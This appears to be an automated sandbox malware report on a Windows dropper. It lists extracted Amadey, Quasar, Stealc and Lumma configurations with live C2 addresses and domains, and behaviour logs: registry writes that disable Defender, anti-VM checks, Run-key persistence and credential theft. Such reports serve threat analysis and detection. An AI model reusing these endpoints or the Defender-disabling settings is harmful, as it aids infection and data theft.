Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08-12-2024 21:08
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20241007-en
General
-
Target
file.exe
-
Size
3.2MB
-
MD5
8310dd77fc508989327b7242d9f00757
-
SHA1
0f47666d19e93f838bf9e2d67a1a0c42dd2561f2
-
SHA256
306e3f1775f8481fe89d3575b57d8bcab355e9d55d1b66cbf7b246f8bd2a3dd0
-
SHA512
279770c1ae7698765dca0a7d4cffb6695381f8513ac12283c6e77b80cfd198d2a16c1ed12854f17ca8f91089632bbae65278bf8d157ec01fc3538cdc4416e697
-
SSDEEP
49152:eKsUSrfMdl+qB2OAS4aNPTET48NqCnf9lZOUdcczoJ:eTUqMdQshAS4aNP58NqClPdw
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
quasar
1.4.1
Office04
45.200.148.155:6060
4b3820e0-d123-49d9-b51e-3c4daa4f6874
-
encryption_key
F8879E9B26846C57C99B6F152F74703E1CC15B8B
-
install_name
SecurityHealthSystray.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
SecurityHealthSystray.exe
-
subdirectory
SubDir
Extracted
stealc
stok
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://impend-differ.biz/api
https://print-vexer.biz/api
https://dare-curbys.biz/api
https://covery-mover.biz/api
https://formy-spill.biz/api
https://dwell-exclaim.biz/api
https://zinc-sneark.biz/api
https://se-blurry.biz/api
https://atten-supporse.biz/api
Extracted
lumma
https://atten-supporse.biz/api
https://se-blurry.biz/api
https://zinc-sneark.biz/api
Signatures
-
Amadey family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 8bec737be6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 8bec737be6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 8bec737be6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 8bec737be6.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 8bec737be6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 8bec737be6.exe -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/memory/3968-96-0x0000000000250000-0x00000000009E6000-memory.dmp family_quasar behavioral2/memory/3968-99-0x0000000000250000-0x00000000009E6000-memory.dmp family_quasar -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ kelyBT9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ file.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3a506c3419.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 15e7dc7aff.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8bec737be6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
pid Process 1392 powershell.exe 5600 powershell.exe 5620 powershell.exe 3472 powershell.exe 2940 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion kelyBT9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3a506c3419.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8bec737be6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8bec737be6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 15e7dc7aff.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3a506c3419.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 15e7dc7aff.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion kelyBT9.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation file.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation Build.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation Build.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 3584 powershell.exe 4440 cmd.exe -
Executes dropped EXE 21 IoCs
pid Process 224 skotes.exe 2812 skotes.exe 1372 main.exe 1492 main.exe 3968 kelyBT9.exe 220 Build.exe 4412 hacn.exe 2368 based.exe 4676 hacn.exe 100 based.exe 3820 Build.exe 1228 3a506c3419.exe 3472 hacn.exe 4636 based.exe 3336 based.exe 5344 15e7dc7aff.exe 5028 991591cf9b.exe 6116 rar.exe 5388 8bec737be6.exe 5892 skotes.exe 5276 skotes.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine 3a506c3419.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine 8bec737be6.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine file.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine kelyBT9.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine 15e7dc7aff.exe -
Loads dropped DLL 38 IoCs
pid Process 1492 main.exe 1492 main.exe 4676 hacn.exe 4676 hacn.exe 100 based.exe 100 based.exe 100 based.exe 100 based.exe 100 based.exe 100 based.exe 100 based.exe 100 based.exe 100 based.exe 100 based.exe 100 based.exe 100 based.exe 100 based.exe 100 based.exe 3472 hacn.exe 3472 hacn.exe 100 based.exe 100 based.exe 100 based.exe 3336 based.exe 3336 based.exe 3336 based.exe 3336 based.exe 3336 based.exe 3336 based.exe 3336 based.exe 3336 based.exe 3336 based.exe 3336 based.exe 3336 based.exe 3336 based.exe 3336 based.exe 3336 based.exe 3336 based.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 8bec737be6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 8bec737be6.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3a506c3419.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013272001\\3a506c3419.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\15e7dc7aff.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013273001\\15e7dc7aff.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\991591cf9b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013274001\\991591cf9b.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8bec737be6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013275001\\8bec737be6.exe" skotes.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 151 discord.com 150 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 148 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0008000000023ca3-523.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 2156 tasklist.exe 2288 tasklist.exe 5116 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 1840 file.exe 224 skotes.exe 2812 skotes.exe 3968 kelyBT9.exe 1228 3a506c3419.exe 5344 15e7dc7aff.exe 5388 8bec737be6.exe 5892 skotes.exe 5276 skotes.exe -
resource yara_rule behavioral2/files/0x0007000000023c7f-61.dat upx behavioral2/memory/1492-65-0x00007FFB39110000-0x00007FFB396FE000-memory.dmp upx behavioral2/files/0x0007000000023c7a-75.dat upx behavioral2/files/0x0007000000023c79-74.dat upx behavioral2/files/0x0007000000023c78-73.dat upx behavioral2/files/0x0007000000023c77-72.dat upx behavioral2/files/0x0007000000023c76-71.dat upx behavioral2/files/0x0007000000023c81-70.dat upx behavioral2/files/0x0007000000023c80-69.dat upx behavioral2/files/0x0007000000023c7e-68.dat upx behavioral2/files/0x0007000000023c88-153.dat upx behavioral2/memory/4676-162-0x00007FFB391B0000-0x00007FFB3961A000-memory.dmp upx behavioral2/memory/100-177-0x00007FFB38BC0000-0x00007FFB391AE000-memory.dmp upx behavioral2/files/0x0007000000023c85-176.dat upx behavioral2/memory/100-196-0x00007FFB4DC60000-0x00007FFB4DC6F000-memory.dmp upx behavioral2/memory/100-195-0x00007FFB48550000-0x00007FFB48574000-memory.dmp upx behavioral2/files/0x0007000000023c9f-189.dat upx behavioral2/files/0x0007000000023c9a-185.dat upx behavioral2/files/0x0007000000023c99-182.dat upx behavioral2/files/0x0007000000023c8e-180.dat upx behavioral2/files/0x0007000000023c84-175.dat upx behavioral2/files/0x0008000000023c81-174.dat upx behavioral2/files/0x0008000000023c80-173.dat upx behavioral2/files/0x0008000000023c7f-172.dat upx behavioral2/files/0x0007000000023c8a-171.dat upx behavioral2/files/0x0007000000023c89-170.dat upx behavioral2/files/0x0007000000023c87-169.dat upx behavioral2/memory/100-217-0x00007FFB48530000-0x00007FFB48549000-memory.dmp upx behavioral2/memory/100-216-0x00007FFB44BB0000-0x00007FFB44BDD000-memory.dmp upx behavioral2/memory/100-219-0x00007FFB394A0000-0x00007FFB39616000-memory.dmp upx behavioral2/memory/100-218-0x00007FFB44680000-0x00007FFB446A3000-memory.dmp upx behavioral2/memory/100-220-0x00007FFB48B90000-0x00007FFB48BA9000-memory.dmp upx behavioral2/memory/100-224-0x00007FFB3A940000-0x00007FFB3A973000-memory.dmp upx behavioral2/memory/100-222-0x00007FFB4DBB0000-0x00007FFB4DBBD000-memory.dmp upx behavioral2/memory/100-221-0x00007FFB38BC0000-0x00007FFB391AE000-memory.dmp upx behavioral2/memory/100-223-0x00007FFB48550000-0x00007FFB48574000-memory.dmp upx behavioral2/memory/100-250-0x00007FFB392B0000-0x00007FFB393CC000-memory.dmp upx behavioral2/memory/100-246-0x00007FFB40000000-0x00007FFB40014000-memory.dmp upx behavioral2/memory/3336-256-0x00007FFB37C30000-0x00007FFB3821E000-memory.dmp upx behavioral2/memory/100-242-0x00007FFB4D730000-0x00007FFB4D73D000-memory.dmp upx behavioral2/memory/3472-241-0x00007FFB38220000-0x00007FFB3868A000-memory.dmp upx behavioral2/memory/100-226-0x00007FFB38690000-0x00007FFB38BB2000-memory.dmp upx behavioral2/memory/100-225-0x00007FFB393D0000-0x00007FFB3949D000-memory.dmp upx behavioral2/memory/3472-260-0x00007FFB38220000-0x00007FFB3868A000-memory.dmp upx behavioral2/memory/100-264-0x00007FFB44680000-0x00007FFB446A3000-memory.dmp upx behavioral2/memory/3336-263-0x00007FFB4D410000-0x00007FFB4D41F000-memory.dmp upx behavioral2/memory/3336-262-0x00007FFB39260000-0x00007FFB39284000-memory.dmp upx behavioral2/memory/100-270-0x00007FFB394A0000-0x00007FFB39616000-memory.dmp upx behavioral2/memory/3336-275-0x00007FFB39210000-0x00007FFB39233000-memory.dmp upx behavioral2/memory/3336-335-0x00007FFB38510000-0x00007FFB38686000-memory.dmp upx behavioral2/memory/100-334-0x00007FFB38690000-0x00007FFB38BB2000-memory.dmp upx behavioral2/memory/3336-337-0x00007FFB492F0000-0x00007FFB492FD000-memory.dmp upx behavioral2/memory/3336-336-0x00007FFB391D0000-0x00007FFB391E9000-memory.dmp upx behavioral2/memory/100-333-0x00007FFB393D0000-0x00007FFB3949D000-memory.dmp upx behavioral2/memory/100-332-0x00007FFB3A940000-0x00007FFB3A973000-memory.dmp upx behavioral2/memory/3336-273-0x00007FFB39240000-0x00007FFB39259000-memory.dmp upx behavioral2/memory/100-272-0x00007FFB48B90000-0x00007FFB48BA9000-memory.dmp upx behavioral2/memory/3336-342-0x00007FFB33F30000-0x00007FFB34452000-memory.dmp upx behavioral2/memory/3336-344-0x00007FFB33E60000-0x00007FFB33F2D000-memory.dmp upx behavioral2/memory/3336-350-0x00007FFB49280000-0x00007FFB4928D000-memory.dmp upx behavioral2/memory/3336-361-0x00007FFB33F30000-0x00007FFB34452000-memory.dmp upx behavioral2/memory/3336-373-0x00007FFB33E60000-0x00007FFB33F2D000-memory.dmp upx behavioral2/memory/3336-360-0x00007FFB38240000-0x00007FFB38273000-memory.dmp upx behavioral2/memory/3336-359-0x00007FFB492F0000-0x00007FFB492FD000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job file.exe -
Detects Pyinstaller 2 IoCs
resource yara_rule behavioral2/files/0x0008000000023bde-37.dat pyinstaller behavioral2/files/0x0008000000023c83-108.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4588 1228 WerFault.exe 109 -
System Location Discovery: System Language Discovery 1 TTPs 17 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 991591cf9b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kelyBT9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8bec737be6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 991591cf9b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 991591cf9b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3a506c3419.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 15e7dc7aff.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Build.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4216 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 5248 systeminfo.exe -
Kills process with taskkill 5 IoCs
pid Process 5992 taskkill.exe 6080 taskkill.exe 2344 taskkill.exe 2956 taskkill.exe 5116 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2428 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 52 IoCs
pid Process 1840 file.exe 1840 file.exe 224 skotes.exe 224 skotes.exe 2812 skotes.exe 2812 skotes.exe 3968 kelyBT9.exe 3968 kelyBT9.exe 1228 3a506c3419.exe 1228 3a506c3419.exe 1392 powershell.exe 1392 powershell.exe 2940 powershell.exe 2940 powershell.exe 3584 powershell.exe 3584 powershell.exe 3472 powershell.exe 3472 powershell.exe 1392 powershell.exe 2940 powershell.exe 3584 powershell.exe 3472 powershell.exe 5188 powershell.exe 5188 powershell.exe 5188 powershell.exe 5600 powershell.exe 5600 powershell.exe 5344 15e7dc7aff.exe 5344 15e7dc7aff.exe 5600 powershell.exe 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe 5028 991591cf9b.exe 5028 991591cf9b.exe 5388 8bec737be6.exe 5388 8bec737be6.exe 5388 8bec737be6.exe 5388 8bec737be6.exe 5388 8bec737be6.exe 5028 991591cf9b.exe 5028 991591cf9b.exe 5620 powershell.exe 5620 powershell.exe 5620 powershell.exe 5964 powershell.exe 5964 powershell.exe 5964 powershell.exe 5892 skotes.exe 5892 skotes.exe 5276 skotes.exe 5276 skotes.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3968 kelyBT9.exe Token: SeDebugPrivilege 5116 tasklist.exe Token: SeDebugPrivilege 2288 tasklist.exe Token: SeIncreaseQuotaPrivilege 4684 WMIC.exe Token: SeSecurityPrivilege 4684 WMIC.exe Token: SeTakeOwnershipPrivilege 4684 WMIC.exe Token: SeLoadDriverPrivilege 4684 WMIC.exe Token: SeSystemProfilePrivilege 4684 WMIC.exe Token: SeSystemtimePrivilege 4684 WMIC.exe Token: SeProfSingleProcessPrivilege 4684 WMIC.exe Token: SeIncBasePriorityPrivilege 4684 WMIC.exe Token: SeCreatePagefilePrivilege 4684 WMIC.exe Token: SeBackupPrivilege 4684 WMIC.exe Token: SeRestorePrivilege 4684 WMIC.exe Token: SeShutdownPrivilege 4684 WMIC.exe Token: SeDebugPrivilege 4684 WMIC.exe Token: SeSystemEnvironmentPrivilege 4684 WMIC.exe Token: SeRemoteShutdownPrivilege 4684 WMIC.exe Token: SeUndockPrivilege 4684 WMIC.exe Token: SeManageVolumePrivilege 4684 WMIC.exe Token: 33 4684 WMIC.exe Token: 34 4684 WMIC.exe Token: 35 4684 WMIC.exe Token: 36 4684 WMIC.exe Token: SeDebugPrivilege 2156 tasklist.exe Token: SeDebugPrivilege 1392 powershell.exe Token: SeDebugPrivilege 2940 powershell.exe Token: SeDebugPrivilege 3584 powershell.exe Token: SeDebugPrivilege 3472 powershell.exe Token: SeDebugPrivilege 5188 powershell.exe Token: SeIncreaseQuotaPrivilege 4684 WMIC.exe Token: SeSecurityPrivilege 4684 WMIC.exe Token: SeTakeOwnershipPrivilege 4684 WMIC.exe Token: SeLoadDriverPrivilege 4684 WMIC.exe Token: SeSystemProfilePrivilege 4684 WMIC.exe Token: SeSystemtimePrivilege 4684 WMIC.exe Token: SeProfSingleProcessPrivilege 4684 WMIC.exe Token: SeIncBasePriorityPrivilege 4684 WMIC.exe Token: SeCreatePagefilePrivilege 4684 WMIC.exe Token: SeBackupPrivilege 4684 WMIC.exe Token: SeRestorePrivilege 4684 WMIC.exe Token: SeShutdownPrivilege 4684 WMIC.exe Token: SeDebugPrivilege 4684 WMIC.exe Token: SeSystemEnvironmentPrivilege 4684 WMIC.exe Token: SeRemoteShutdownPrivilege 4684 WMIC.exe Token: SeUndockPrivilege 4684 WMIC.exe Token: SeManageVolumePrivilege 4684 WMIC.exe Token: 33 4684 WMIC.exe Token: 34 4684 WMIC.exe Token: 35 4684 WMIC.exe Token: 36 4684 WMIC.exe Token: SeDebugPrivilege 5600 powershell.exe Token: SeDebugPrivilege 1620 powershell.exe Token: SeDebugPrivilege 2344 taskkill.exe Token: SeDebugPrivilege 2956 taskkill.exe Token: SeDebugPrivilege 5116 taskkill.exe Token: SeDebugPrivilege 5992 taskkill.exe Token: SeDebugPrivilege 6080 taskkill.exe Token: SeIncreaseQuotaPrivilege 5240 WMIC.exe Token: SeSecurityPrivilege 5240 WMIC.exe Token: SeTakeOwnershipPrivilege 5240 WMIC.exe Token: SeLoadDriverPrivilege 5240 WMIC.exe Token: SeSystemProfilePrivilege 5240 WMIC.exe Token: SeSystemtimePrivilege 5240 WMIC.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 1840 file.exe 5028 991591cf9b.exe 5028 991591cf9b.exe 5028 991591cf9b.exe 5028 991591cf9b.exe 5028 991591cf9b.exe 5028 991591cf9b.exe 5028 991591cf9b.exe 5028 991591cf9b.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5028 991591cf9b.exe 5028 991591cf9b.exe 5028 991591cf9b.exe -
Suspicious use of SendNotifyMessage 31 IoCs
pid Process 5028 991591cf9b.exe 5028 991591cf9b.exe 5028 991591cf9b.exe 5028 991591cf9b.exe 5028 991591cf9b.exe 5028 991591cf9b.exe 5028 991591cf9b.exe 5028 991591cf9b.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5228 firefox.exe 5028 991591cf9b.exe 5028 991591cf9b.exe 5028 991591cf9b.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5228 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1840 wrote to memory of 224 1840 file.exe 82 PID 1840 wrote to memory of 224 1840 file.exe 82 PID 1840 wrote to memory of 224 1840 file.exe 82 PID 224 wrote to memory of 1372 224 skotes.exe 93 PID 224 wrote to memory of 1372 224 skotes.exe 93 PID 1372 wrote to memory of 1492 1372 main.exe 94 PID 1372 wrote to memory of 1492 1372 main.exe 94 PID 1492 wrote to memory of 4256 1492 main.exe 95 PID 1492 wrote to memory of 4256 1492 main.exe 95 PID 224 wrote to memory of 3968 224 skotes.exe 97 PID 224 wrote to memory of 3968 224 skotes.exe 97 PID 224 wrote to memory of 3968 224 skotes.exe 97 PID 4256 wrote to memory of 220 4256 cmd.exe 98 PID 4256 wrote to memory of 220 4256 cmd.exe 98 PID 4256 wrote to memory of 220 4256 cmd.exe 98 PID 220 wrote to memory of 4412 220 Build.exe 99 PID 220 wrote to memory of 4412 220 Build.exe 99 PID 220 wrote to memory of 2368 220 Build.exe 101 PID 220 wrote to memory of 2368 220 Build.exe 101 PID 4412 wrote to memory of 4676 4412 hacn.exe 102 PID 4412 wrote to memory of 4676 4412 hacn.exe 102 PID 2368 wrote to memory of 100 2368 based.exe 103 PID 2368 wrote to memory of 100 2368 based.exe 103 PID 4676 wrote to memory of 2856 4676 hacn.exe 104 PID 4676 wrote to memory of 2856 4676 hacn.exe 104 PID 3968 wrote to memory of 2428 3968 kelyBT9.exe 106 PID 3968 wrote to memory of 2428 3968 kelyBT9.exe 106 PID 3968 wrote to memory of 2428 3968 kelyBT9.exe 106 PID 2856 wrote to memory of 3820 2856 cmd.exe 108 PID 2856 wrote to memory of 3820 2856 cmd.exe 108 PID 2856 wrote to memory of 3820 2856 cmd.exe 108 PID 224 wrote to memory of 1228 224 skotes.exe 109 PID 224 wrote to memory of 1228 224 skotes.exe 109 PID 224 wrote to memory of 1228 224 skotes.exe 109 PID 3820 wrote to memory of 3472 3820 Build.exe 138 PID 3820 wrote to memory of 3472 3820 Build.exe 138 PID 3820 wrote to memory of 4636 3820 Build.exe 111 PID 3820 wrote to memory of 4636 3820 Build.exe 111 PID 100 wrote to memory of 3804 100 based.exe 112 PID 100 wrote to memory of 3804 100 based.exe 112 PID 100 wrote to memory of 856 100 based.exe 113 PID 100 wrote to memory of 856 100 based.exe 113 PID 100 wrote to memory of 1808 100 based.exe 114 PID 100 wrote to memory of 1808 100 based.exe 114 PID 4636 wrote to memory of 3336 4636 based.exe 118 PID 4636 wrote to memory of 3336 4636 based.exe 118 PID 100 wrote to memory of 1544 100 based.exe 119 PID 100 wrote to memory of 1544 100 based.exe 119 PID 100 wrote to memory of 916 100 based.exe 120 PID 100 wrote to memory of 916 100 based.exe 120 PID 100 wrote to memory of 3208 100 based.exe 123 PID 100 wrote to memory of 3208 100 based.exe 123 PID 1544 wrote to memory of 5116 1544 cmd.exe 124 PID 1544 wrote to memory of 5116 1544 cmd.exe 124 PID 100 wrote to memory of 4440 100 based.exe 125 PID 100 wrote to memory of 4440 100 based.exe 125 